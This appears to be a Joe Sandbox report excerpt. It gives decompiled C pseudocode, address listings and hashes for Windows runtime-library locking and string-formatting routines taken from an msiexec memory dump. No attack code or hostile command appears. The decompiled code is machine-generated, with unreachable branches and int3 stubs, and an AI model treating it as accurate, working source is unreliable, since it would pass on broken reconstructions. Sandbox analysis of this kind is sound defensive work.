                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 49%
                                            			E02750554(signed int _a4, char _a8) {
                                            				void* __ebx;
                                            				void* __edi;
                                            				void* __esi;
                                            				signed int* _t49;
                                            				signed int _t51;
                                            				signed int _t56;
                                            				signed int _t58;
                                            				signed int _t61;
                                            				signed int _t63;
                                            				void* _t66;
                                            				intOrPtr _t67;
                                            				signed int _t70;
                                            				void* _t75;
                                            				signed int _t81;
                                            				signed int _t84;
                                            				void* _t86;
                                            				signed int _t93;
                                            				signed int _t96;
                                            				intOrPtr _t105;
                                            				signed int _t107;
                                            				void* _t110;
                                            				signed int _t115;
                                            				signed int* _t119;
                                            				void* _t125;
                                            				void* _t126;
                                            				signed int _t128;
                                            				signed int _t130;
                                            				signed int _t138;
                                            				signed int _t144;
                                            				void* _t158;
                                            				void* _t159;
                                            				void* _t160;
                                            
                                            				_t96 = _a4;
                                            				_t115 =  *(_t96 + 0x28);
                                            				_push(_t138);
                                            				if(_t115 < 0) {
                                            					_t105 =  *[fs:0x18];
                                            					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
                                            					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
                                            						goto L6;
                                            					} else {
                                            						__eflags = _t115 | 0xffffffff;
                                            						asm("lock xadd [eax], edx");
                                            						return 1;
                                            					}
                                            				} else {
                                            					L6:
                                            					_push(_t128);
                                            					while(1) {
                                            						L7:
                                            						__eflags = _t115;
                                            						if(_t115 >= 0) {
                                            							break;
                                            						}
                                            						__eflags = _a8;
                                            						if(_a8 == 0) {
                                            							__eflags = 0;
                                            							return 0;
                                            						} else {
                                            							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
                                            							_t49 = _t96 + 0x1c;
                                            							_t106 = 1;
                                            							asm("lock xadd [edx], ecx");
                                            							_t115 =  *(_t96 + 0x28);
                                            							__eflags = _t115;
                                            							if(_t115 < 0) {
                                            								L23:
                                            								_t130 = 0;
                                            								__eflags = 0;
                                            								while(1) {
                                            									_t118 =  *(_t96 + 0x30) & 0x00000001;
                                            									asm("sbb esi, esi");
                                            									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x027f01c0;
                                            									_push(_t144);
                                            									_push(0);
                                            									_t51 = E0270F8CC( *((intOrPtr*)(_t96 + 0x18)));
                                            									__eflags = _t51 - 0x102;
                                            									if(_t51 != 0x102) {
                                            										break;
                                            									}
                                            									_t106 =  *(_t144 + 4);
                                            									_t126 =  *_t144;
                                            									_t86 = E02754FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
                                            									_push(_t126);
                                            									_push(_t86);
                                            									E02763F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
                                            									E02763F92(0x65, 0, "RTL: Resource at %p\n", _t96);
                                            									_t130 = _t130 + 1;
                                            									_t160 = _t158 + 0x28;
                                            									__eflags = _t130 - 2;
                                            									if(__eflags > 0) {
                                            										E0279217A(_t106, __eflags, _t96);
                                            									}
                                            									_push("RTL: Re-Waiting\n");
                                            									_push(0);
                                            									_push(0x65);
                                            									E02763F92();
                                            									_t158 = _t160 + 0xc;
                                            								}
                                            								__eflags = _t51;
                                            								if(__eflags < 0) {
                                            									_push(_t51);
                                            									E02753915(_t96, _t106, _t118, _t130, _t144, __eflags);
                                            									asm("int3");
                                            									while(1) {
                                            										L32:
                                            										__eflags = _a8;
                                            										if(_a8 == 0) {
                                            											break;
                                            										}
                                            										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
                                            										_t119 = _t96 + 0x24;
                                            										_t107 = 1;
                                            										asm("lock xadd [eax], ecx");
                                            										_t56 =  *(_t96 + 0x28);
                                            										_a4 = _t56;
                                            										__eflags = _t56;
                                            										if(_t56 != 0) {
                                            											L40:
                                            											_t128 = 0;
                                            											__eflags = 0;
                                            											while(1) {
                                            												_t121 =  *(_t96 + 0x30) & 0x00000001;
                                            												asm("sbb esi, esi");
                                            												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x027f01c0;
                                            												_push(_t138);
                                            												_push(0);
                                            												_t58 = E0270F8CC( *((intOrPtr*)(_t96 + 0x20)));
                                            												__eflags = _t58 - 0x102;
                                            												if(_t58 != 0x102) {
                                            													break;
                                            												}
                                            												_t107 =  *(_t138 + 4);
                                            												_t125 =  *_t138;
                                            												_t75 = E02754FC0(_t125, _t107, 0xff676980, 0xffffffff);
                                            												_push(_t125);
                                            												_push(_t75);
                                            												E02763F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
                                            												E02763F92(0x65, 0, "RTL: Resource at %p\n", _t96);
                                            												_t128 = _t128 + 1;
                                            												_t159 = _t158 + 0x28;
                                            												__eflags = _t128 - 2;
                                            												if(__eflags > 0) {
                                            													E0279217A(_t107, __eflags, _t96);
                                            												}
                                            												_push("RTL: Re-Waiting\n");
                                            												_push(0);
                                            												_push(0x65);
                                            												E02763F92();
                                            												_t158 = _t159 + 0xc;
                                            											}
                                            											__eflags = _t58;
                                            											if(__eflags < 0) {
                                            												_push(_t58);
                                            												E02753915(_t96, _t107, _t121, _t128, _t138, __eflags);
                                            												asm("int3");
                                            												_t61 =  *_t107;
                                            												 *_t107 = 0;
                                            												__eflags = _t61;
                                            												if(_t61 == 0) {
                                            													L1:
                                            													_t63 = E02735384(_t138 + 0x24);
                                            													if(_t63 != 0) {
                                            														goto L52;
                                            													} else {
                                            														goto L2;
                                            													}
                                            												} else {
                                            													_t123 =  *((intOrPtr*)(_t138 + 0x18));
                                            													_push( &_a4);
                                            													_push(_t61);
                                            													_t70 = E0270F970( *((intOrPtr*)(_t138 + 0x18)));
                                            													__eflags = _t70;
                                            													if(__eflags >= 0) {
                                            														goto L1;
                                            													} else {
                                            														_push(_t70);
                                            														E02753915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
                                            														L52:
                                            														_t122 =  *((intOrPtr*)(_t138 + 0x20));
                                            														_push( &_a4);
                                            														_push(1);
                                            														_t63 = E0270F970( *((intOrPtr*)(_t138 + 0x20)));
                                            														__eflags = _t63;
                                            														if(__eflags >= 0) {
                                            															L2:
                                            															return _t63;
                                            														} else {
                                            															_push(_t63);
                                            															E02753915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
                                            															_t109 =  *((intOrPtr*)(_t138 + 0x20));
                                            															_push( &_a4);
                                            															_push(1);
                                            															_t63 = E0270F970( *((intOrPtr*)(_t138 + 0x20)));
                                            															__eflags = _t63;
                                            															if(__eflags >= 0) {
                                            																goto L2;
                                            															} else {
                                            																_push(_t63);
                                            																_t66 = E02753915(_t96, _t109, _t122, _t128, _t138, __eflags);
                                            																asm("int3");
                                            																while(1) {
                                            																	_t110 = _t66;
                                            																	__eflags = _t66 - 1;
                                            																	if(_t66 != 1) {
                                            																		break;
                                            																	}
                                            																	_t128 = _t128 | 0xffffffff;
                                            																	_t66 = _t110;
                                            																	asm("lock cmpxchg [ebx], edi");
                                            																	__eflags = _t66 - _t110;
                                            																	if(_t66 != _t110) {
                                            																		continue;
                                            																	} else {
                                            																		_t67 =  *[fs:0x18];
                                            																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
                                            																		return _t67;
                                            																	}
                                            																	goto L58;
                                            																}
                                            																E02735329(_t110, _t138);
                                            																return E027353A5(_t138, 1);
                                            															}
                                            														}
                                            													}
                                            												}
                                            											} else {
                                            												_t56 =  *(_t96 + 0x28);
                                            												goto L3;
                                            											}
                                            										} else {
                                            											_t107 =  *_t119;
                                            											__eflags = _t107;
                                            											if(__eflags > 0) {
                                            												while(1) {
                                            													_t81 = _t107;
                                            													asm("lock cmpxchg [edi], esi");
                                            													__eflags = _t81 - _t107;
                                            													if(_t81 == _t107) {
                                            														break;
                                            													}
                                            													_t107 = _t81;
                                            													__eflags = _t81;
                                            													if(_t81 > 0) {
                                            														continue;
                                            													}
                                            													break;
                                            												}
                                            												_t56 = _a4;
                                            												__eflags = _t107;
                                            											}
                                            											if(__eflags != 0) {
                                            												while(1) {
                                            													L3:
                                            													__eflags = _t56;
                                            													if(_t56 != 0) {
                                            														goto L32;
                                            													}
                                            													_t107 = _t107 | 0xffffffff;
                                            													_t56 = 0;
                                            													asm("lock cmpxchg [edx], ecx");
                                            													__eflags = 0;
                                            													if(0 != 0) {
                                            														continue;
                                            													} else {
                                            														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                            														return 1;
                                            													}
                                            													goto L58;
                                            												}
                                            												continue;
                                            											} else {
                                            												goto L40;
                                            											}
                                            										}
                                            										goto L58;
                                            									}
                                            									__eflags = 0;
                                            									return 0;
                                            								} else {
                                            									_t115 =  *(_t96 + 0x28);
                                            									continue;
                                            								}
                                            							} else {
                                            								_t106 =  *_t49;
                                            								__eflags = _t106;
                                            								if(__eflags > 0) {
                                            									while(1) {
                                            										_t93 = _t106;
                                            										asm("lock cmpxchg [edi], esi");
                                            										__eflags = _t93 - _t106;
                                            										if(_t93 == _t106) {
                                            											break;
                                            										}
                                            										_t106 = _t93;
                                            										__eflags = _t93;
                                            										if(_t93 > 0) {
                                            											continue;
                                            										}
                                            										break;
                                            									}
                                            									__eflags = _t106;
                                            								}
                                            								if(__eflags != 0) {
                                            									continue;
                                            								} else {
                                            									goto L23;
                                            								}
                                            							}
                                            						}
                                            						goto L58;
                                            					}
                                            					_t84 = _t115;
                                            					asm("lock cmpxchg [esi], ecx");
                                            					__eflags = _t84 - _t115;
                                            					if(_t84 != _t115) {
                                            						_t115 = _t84;
                                            						goto L7;
                                            					} else {
                                            						return 1;
                                            					}
                                            				}
                                            				L58:
                                            			}



































                                            0x0275055a
                                            0x0275055d
                                            0x02750563
                                            0x02750566
                                            0x027505d8
                                            0x027505e2
                                            0x027505e5
                                            0x00000000
                                            0x027505e7
                                            0x027505e7
                                            0x027505ea
                                            0x027505f3
                                            0x027505f3
                                            0x02750568
                                            0x02750568
                                            0x02750568
                                            0x02750569
                                            0x02750569
                                            0x02750569
                                            0x0275056b
                                            0x00000000
                                            0x00000000
                                            0x0277217f
                                            0x02772183
                                            0x0277225b
                                            0x0277225f
                                            0x02772189
                                            0x0277218c
                                            0x0277218f
                                            0x02772194
                                            0x02772199
                                            0x0277219d
                                            0x027721a0
                                            0x027721a2
                                            0x027721ce
                                            0x027721ce
                                            0x027721ce
                                            0x027721d0
                                            0x027721d6
                                            0x027721de
                                            0x027721e2
                                            0x027721e8
                                            0x027721e9
                                            0x027721ec
                                            0x027721f1
                                            0x027721f6
                                            0x00000000
                                            0x00000000
                                            0x027721f8
                                            0x027721fb
                                            0x02772206
                                            0x0277220b
                                            0x0277220c
                                            0x02772217
                                            0x02772226
                                            0x0277222b
                                            0x0277222c
                                            0x0277222f
                                            0x02772232
                                            0x02772235
                                            0x02772235
                                            0x0277223a
                                            0x0277223f
                                            0x02772241
                                            0x02772243
                                            0x02772248
                                            0x02772248
                                            0x0277224d
                                            0x0277224f
                                            0x02772262
                                            0x02772263
                                            0x02772268
                                            0x02772269
                                            0x02772269
                                            0x02772269
                                            0x0277226d
                                            0x00000000
                                            0x00000000
                                            0x02772276
                                            0x02772279
                                            0x0277227e
                                            0x02772283
                                            0x02772287
                                            0x0277228a
                                            0x0277228d
                                            0x0277228f
                                            0x027722bc
                                            0x027722bc
                                            0x027722bc
                                            0x027722be
                                            0x027722c4
                                            0x027722cc
                                            0x027722d0
                                            0x027722d6
                                            0x027722d7
                                            0x027722da
                                            0x027722df
                                            0x027722e4
                                            0x00000000
                                            0x00000000
                                            0x027722e6
                                            0x027722e9
                                            0x027722f4
                                            0x027722f9
                                            0x027722fa
                                            0x02772305
                                            0x02772314
                                            0x02772319
                                            0x0277231a
                                            0x0277231d
                                            0x02772320
                                            0x02772323
                                            0x02772323
                                            0x02772328
                                            0x0277232d
                                            0x0277232f
                                            0x02772331
                                            0x02772336
                                            0x02772336
                                            0x0277233b
                                            0x0277233d
                                            0x02772350
                                            0x02772351
                                            0x02772356
                                            0x02772359
                                            0x02772359
                                            0x0277235b
                                            0x0277235d
                                            0x02735367
                                            0x0273536b
                                            0x02735372
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x02772363
                                            0x02772363
                                            0x02772369
                                            0x0277236a
                                            0x0277236c
                                            0x02772371
                                            0x02772373
                                            0x00000000
                                            0x02772379
                                            0x02772379
                                            0x0277237a
                                            0x0277237f
                                            0x0277237f
                                            0x02772385
                                            0x02772386
                                            0x02772389
                                            0x0277238e
                                            0x02772390
                                            0x02735378
                                            0x0273537c
                                            0x02772396
                                            0x02772396
                                            0x02772397
                                            0x0277239c
                                            0x027723a2
                                            0x027723a3
                                            0x027723a6
                                            0x027723ab
                                            0x027723ad
                                            0x00000000
                                            0x027723b3
                                            0x027723b3
                                            0x027723b4
                                            0x027723b9
                                            0x027723ba
                                            0x027723ba
                                            0x027723bc
                                            0x027723bf
                                            0x00000000
                                            0x00000000
                                            0x02769153
                                            0x02769158
                                            0x0276915a
                                            0x0276915e
                                            0x02769160
                                            0x00000000
                                            0x02769166
                                            0x02769166
                                            0x02769171
                                            0x02769176
                                            0x02769176
                                            0x00000000
                                            0x02769160
                                            0x027723c6
                                            0x027723d7
                                            0x027723d7
                                            0x027723ad
                                            0x02772390
                                            0x02772373
                                            0x0277233f
                                            0x0277233f
                                            0x00000000
                                            0x0277233f
                                            0x02772291
                                            0x02772291
                                            0x02772293
                                            0x02772295
                                            0x0277229a
                                            0x027722a1
                                            0x027722a3
                                            0x027722a7
                                            0x027722a9
                                            0x00000000
                                            0x00000000
                                            0x027722ab
                                            0x027722ad
                                            0x027722af
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x027722af
                                            0x027722b1
                                            0x027722b4
                                            0x027722b4
                                            0x027722b6
                                            0x027353be
                                            0x027353be
                                            0x027353be
                                            0x027353c0
                                            0x00000000
                                            0x00000000
                                            0x027353cb
                                            0x027353ce
                                            0x027353d0
                                            0x027353d4
                                            0x027353d6
                                            0x00000000
                                            0x027353d8
                                            0x027353e3
                                            0x027353ea
                                            0x027353ea
                                            0x00000000
                                            0x027353d6
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x027722b6
                                            0x00000000
                                            0x0277228f
                                            0x02772349
                                            0x0277234d
                                            0x02772251
                                            0x02772251
                                            0x00000000
                                            0x02772251
                                            0x027721a4
                                            0x027721a4
                                            0x027721a6
                                            0x027721a8
                                            0x027721ac
                                            0x027721b6
                                            0x027721b8
                                            0x027721bc
                                            0x027721be
                                            0x00000000
                                            0x00000000
                                            0x027721c0
                                            0x027721c2
                                            0x027721c4
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x027721c4
                                            0x027721c6
                                            0x027721c6
                                            0x027721c8
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x027721c8
                                            0x027721a2
                                            0x00000000
                                            0x02772183
                                            0x0275057b
                                            0x0275057d
                                            0x02750581
                                            0x02750583
                                            0x02772178
                                            0x00000000
                                            0x02750589
                                            0x0275058f
                                            0x0275058f
                                            0x02750583
                                            0x00000000

                                            APIs
                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02772206
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.666595776.0000000002700000.00000040.00000001.sdmp, Offset: 026F0000, based on PE: true
                                            • Associated: 00000008.00000002.666576609.00000000026F0000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.666701313.00000000027E0000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.666726521.00000000027F0000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.666740019.00000000027F4000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.666752265.00000000027F7000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.666774306.0000000002800000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.666814054.0000000002860000.00000040.00000001.sdmp Download File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_26f0000_msiexec.jbxd
                                            Similarity
                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                            • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                            • API String ID: 885266447-4236105082
                                            • Opcode ID: e50e0509df26cc16229efab5d55ba238bd796c55c7ddbf9304d5a148ed016555
                                            • Instruction ID: aba9e01e91f1da06a97a9c365a74bf1c82bf1d3c77b0053852ffe63a56a9b152
                                            • Opcode Fuzzy Hash: e50e0509df26cc16229efab5d55ba238bd796c55c7ddbf9304d5a148ed016555
                                            • Instruction Fuzzy Hash: 1A515B717002116FEF15CE18CC85FA673AAAF99710F218259ED65EB3C6DA71EC41CB90
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 64%
                                            			E027514C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
                                            				signed int _v8;
                                            				char _v10;
                                            				char _v140;
                                            				void* __ebx;
                                            				void* __edi;
                                            				void* __esi;
                                            				signed int _t24;
                                            				void* _t26;
                                            				signed int _t29;
                                            				signed int _t34;
                                            				signed int _t40;
                                            				intOrPtr _t45;
                                            				void* _t51;
                                            				intOrPtr* _t52;
                                            				void* _t54;
                                            				signed int _t57;
                                            				void* _t58;
                                            
                                            				_t51 = __edx;
                                            				_t24 =  *0x27f2088; // 0x766d5afb
                                            				_v8 = _t24 ^ _t57;
                                            				_t45 = _a16;
                                            				_t53 = _a4;
                                            				_t52 = _a20;
                                            				if(_a4 == 0 || _t52 == 0) {
                                            					L10:
                                            					_t26 = 0xc000000d;
                                            				} else {
                                            					if(_t45 == 0) {
                                            						if( *_t52 == _t45) {
                                            							goto L3;
                                            						} else {
                                            							goto L10;
                                            						}
                                            					} else {
                                            						L3:
                                            						_t28 =  &_v140;
                                            						if(_a12 != 0) {
                                            							_push("[");
                                            							_push(0x41);
                                            							_push( &_v140);
                                            							_t29 = E02747707();
                                            							_t58 = _t58 + 0xc;
                                            							_t28 = _t57 + _t29 * 2 - 0x88;
                                            						}
                                            						_t54 = E027513CB(_t53, _t28);
                                            						if(_a8 != 0) {
                                            							_t34 = E02747707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
                                            							_t58 = _t58 + 0x10;
                                            							_t54 = _t54 + _t34 * 2;
                                            						}
                                            						if(_a12 != 0) {
                                            							_t40 = E02747707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
                                            							_t58 = _t58 + 0x10;
                                            							_t54 = _t54 + _t40 * 2;
                                            						}
                                            						_t53 = (_t54 -  &_v140 >> 1) + 1;
                                            						 *_t52 = _t53;
                                            						if( *_t52 < _t53) {
                                            							goto L10;
                                            						} else {
                                            							E02712340(_t45,  &_v140, _t53 + _t53);
                                            							_t26 = 0;
                                            						}
                                            					}
                                            				}
                                            				return E0271E1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
                                            			}




















                                            0x027514c0
                                            0x027514cb
                                            0x027514d2
                                            0x027514d6
                                            0x027514da
                                            0x027514de
                                            0x027514e3
                                            0x0275157a
                                            0x0275157a
                                            0x027514f1
                                            0x027514f3
                                            0x0277ea0f
                                            0x00000000
                                            0x0277ea15
                                            0x00000000
                                            0x0277ea15
                                            0x027514f9
                                            0x027514f9
                                            0x027514fe
                                            0x02751504
                                            0x0277ea1a
                                            0x0277ea1f
                                            0x0277ea21
                                            0x0277ea22
                                            0x0277ea27
                                            0x0277ea2a
                                            0x0277ea2a
                                            0x02751515
                                            0x02751517
                                            0x0275156d
                                            0x02751572
                                            0x02751575
                                            0x02751575
                                            0x0275151e
                                            0x0277ea50
                                            0x0277ea55
                                            0x0277ea58
                                            0x0277ea58
                                            0x0275152e
                                            0x02751531
                                            0x02751533
                                            0x00000000
                                            0x02751535
                                            0x02751541
                                            0x02751549
                                            0x02751549
                                            0x02751533
                                            0x027514f3
                                            0x02751559

                                            APIs
                                            • ___swprintf_l.LIBCMT ref: 0277EA22
                                              • Part of subcall function 027513CB: ___swprintf_l.LIBCMT ref: 0275146B
                                              • Part of subcall function 027513CB: ___swprintf_l.LIBCMT ref: 02751490
                                            • ___swprintf_l.LIBCMT ref: 0275156D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.666595776.0000000002700000.00000040.00000001.sdmp, Offset: 026F0000, based on PE: true
                                            • Associated: 00000008.00000002.666576609.00000000026F0000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.666701313.00000000027E0000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.666726521.00000000027F0000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.666740019.00000000027F4000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.666752265.00000000027F7000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.666774306.0000000002800000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.666814054.0000000002860000.00000040.00000001.sdmp Download File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_26f0000_msiexec.jbxd
                                            Similarity
                                            • API ID: ___swprintf_l
                                            • String ID: %%%u$]:%u
                                            • API String ID: 48624451-3050659472
                                            • Opcode ID: f5910cfbab866f2724a5b596e85a24608e9c4bdc087c5c2e5463c13c95dad4f9
                                            • Instruction ID: 7afe509b1bd5575553b4909eed7f4abd579deb6ab5fe5cec9bbc7d297d790c4d
                                            • Opcode Fuzzy Hash: f5910cfbab866f2724a5b596e85a24608e9c4bdc087c5c2e5463c13c95dad4f9
                                            • Instruction Fuzzy Hash: 6121C3729002399BDF21DE58CC44BEEB3BDAF10705F854451ED4AE3140EBB0EA598BE1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 44%
                                            			E027353A5(signed int _a4, char _a8) {
                                            				void* __ebx;
                                            				void* __edi;
                                            				void* __esi;
                                            				signed int _t32;
                                            				signed int _t37;
                                            				signed int _t40;
                                            				signed int _t42;
                                            				void* _t45;
                                            				intOrPtr _t46;
                                            				signed int _t49;
                                            				void* _t51;
                                            				signed int _t57;
                                            				signed int _t64;
                                            				signed int _t71;
                                            				void* _t74;
                                            				intOrPtr _t78;
                                            				signed int* _t79;
                                            				void* _t85;
                                            				signed int _t86;
                                            				signed int _t92;
                                            				void* _t104;
                                            				void* _t105;
                                            
                                            				_t64 = _a4;
                                            				_t32 =  *(_t64 + 0x28);
                                            				_t71 = _t64 + 0x28;
                                            				_push(_t92);
                                            				if(_t32 < 0) {
                                            					_t78 =  *[fs:0x18];
                                            					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
                                            					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
                                            						goto L3;
                                            					} else {
                                            						__eflags = _t32 | 0xffffffff;
                                            						asm("lock xadd [ecx], eax");
                                            						return 1;
                                            					}
                                            				} else {
                                            					L3:
                                            					_push(_t86);
                                            					while(1) {
                                            						L4:
                                            						__eflags = _t32;
                                            						if(_t32 == 0) {
                                            							break;
                                            						}
                                            						__eflags = _a8;
                                            						if(_a8 == 0) {
                                            							__eflags = 0;
                                            							return 0;
                                            						} else {
                                            							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
                                            							_t79 = _t64 + 0x24;
                                            							_t71 = 1;
                                            							asm("lock xadd [eax], ecx");
                                            							_t32 =  *(_t64 + 0x28);
                                            							_a4 = _t32;
                                            							__eflags = _t32;
                                            							if(_t32 != 0) {
                                            								L19:
                                            								_t86 = 0;
                                            								__eflags = 0;
                                            								while(1) {
                                            									_t81 =  *(_t64 + 0x30) & 0x00000001;
                                            									asm("sbb esi, esi");
                                            									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x027f01c0;
                                            									_push(_t92);
                                            									_push(0);
                                            									_t37 = E0270F8CC( *((intOrPtr*)(_t64 + 0x20)));
                                            									__eflags = _t37 - 0x102;
                                            									if(_t37 != 0x102) {
                                            										break;
                                            									}
                                            									_t71 =  *(_t92 + 4);
                                            									_t85 =  *_t92;
                                            									_t51 = E02754FC0(_t85, _t71, 0xff676980, 0xffffffff);
                                            									_push(_t85);
                                            									_push(_t51);
                                            									E02763F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
                                            									E02763F92(0x65, 0, "RTL: Resource at %p\n", _t64);
                                            									_t86 = _t86 + 1;
                                            									_t105 = _t104 + 0x28;
                                            									__eflags = _t86 - 2;
                                            									if(__eflags > 0) {
                                            										E0279217A(_t71, __eflags, _t64);
                                            									}
                                            									_push("RTL: Re-Waiting\n");
                                            									_push(0);
                                            									_push(0x65);
                                            									E02763F92();
                                            									_t104 = _t105 + 0xc;
                                            								}
                                            								__eflags = _t37;
                                            								if(__eflags < 0) {
                                            									_push(_t37);
                                            									E02753915(_t64, _t71, _t81, _t86, _t92, __eflags);
                                            									asm("int3");
                                            									_t40 =  *_t71;
                                            									 *_t71 = 0;
                                            									__eflags = _t40;
                                            									if(_t40 == 0) {
                                            										L1:
                                            										_t42 = E02735384(_t92 + 0x24);
                                            										if(_t42 != 0) {
                                            											goto L31;
                                            										} else {
                                            											goto L2;
                                            										}
                                            									} else {
                                            										_t83 =  *((intOrPtr*)(_t92 + 0x18));
                                            										_push( &_a4);
                                            										_push(_t40);
                                            										_t49 = E0270F970( *((intOrPtr*)(_t92 + 0x18)));
                                            										__eflags = _t49;
                                            										if(__eflags >= 0) {
                                            											goto L1;
                                            										} else {
                                            											_push(_t49);
                                            											E02753915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
                                            											L31:
                                            											_t82 =  *((intOrPtr*)(_t92 + 0x20));
                                            											_push( &_a4);
                                            											_push(1);
                                            											_t42 = E0270F970( *((intOrPtr*)(_t92 + 0x20)));
                                            											__eflags = _t42;
                                            											if(__eflags >= 0) {
                                            												L2:
                                            												return _t42;
                                            											} else {
                                            												_push(_t42);
                                            												E02753915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
                                            												_t73 =  *((intOrPtr*)(_t92 + 0x20));
                                            												_push( &_a4);
                                            												_push(1);
                                            												_t42 = E0270F970( *((intOrPtr*)(_t92 + 0x20)));
                                            												__eflags = _t42;
                                            												if(__eflags >= 0) {
                                            													goto L2;
                                            												} else {
                                            													_push(_t42);
                                            													_t45 = E02753915(_t64, _t73, _t82, _t86, _t92, __eflags);
                                            													asm("int3");
                                            													while(1) {
                                            														_t74 = _t45;
                                            														__eflags = _t45 - 1;
                                            														if(_t45 != 1) {
                                            															break;
                                            														}
                                            														_t86 = _t86 | 0xffffffff;
                                            														_t45 = _t74;
                                            														asm("lock cmpxchg [ebx], edi");
                                            														__eflags = _t45 - _t74;
                                            														if(_t45 != _t74) {
                                            															continue;
                                            														} else {
                                            															_t46 =  *[fs:0x18];
                                            															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
                                            															return _t46;
                                            														}
                                            														goto L37;
                                            													}
                                            													E02735329(_t74, _t92);
                                            													_push(1);
                                            													return E027353A5(_t92);
                                            												}
                                            											}
                                            										}
                                            									}
                                            								} else {
                                            									_t32 =  *(_t64 + 0x28);
                                            									continue;
                                            								}
                                            							} else {
                                            								_t71 =  *_t79;
                                            								__eflags = _t71;
                                            								if(__eflags > 0) {
                                            									while(1) {
                                            										_t57 = _t71;
                                            										asm("lock cmpxchg [edi], esi");
                                            										__eflags = _t57 - _t71;
                                            										if(_t57 == _t71) {
                                            											break;
                                            										}
                                            										_t71 = _t57;
                                            										__eflags = _t57;
                                            										if(_t57 > 0) {
                                            											continue;
                                            										}
                                            										break;
                                            									}
                                            									_t32 = _a4;
                                            									__eflags = _t71;
                                            								}
                                            								if(__eflags != 0) {
                                            									continue;
                                            								} else {
                                            									goto L19;
                                            								}
                                            							}
                                            						}
                                            						goto L37;
                                            					}
                                            					_t71 = _t71 | 0xffffffff;
                                            					_t32 = 0;
                                            					asm("lock cmpxchg [edx], ecx");
                                            					__eflags = 0;
                                            					if(0 != 0) {
                                            						goto L4;
                                            					} else {
                                            						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                            						return 1;
                                            					}
                                            				}
                                            				L37:
                                            			}

























                                            0x027353ab
                                            0x027353ae
                                            0x027353b1
                                            0x027353b4
                                            0x027353b7
                                            0x027505b6
                                            0x027505c0
                                            0x027505c3
                                            0x00000000
                                            0x027505c9
                                            0x027505c9
                                            0x027505cc
                                            0x027505d5
                                            0x027505d5
                                            0x027353bd
                                            0x027353bd
                                            0x027353bd
                                            0x027353be
                                            0x027353be
                                            0x027353be
                                            0x027353c0
                                            0x00000000
                                            0x00000000
                                            0x02772269
                                            0x0277226d
                                            0x02772349
                                            0x0277234d
                                            0x02772273
                                            0x02772276
                                            0x02772279
                                            0x0277227e
                                            0x02772283
                                            0x02772287
                                            0x0277228a
                                            0x0277228d
                                            0x0277228f
                                            0x027722bc
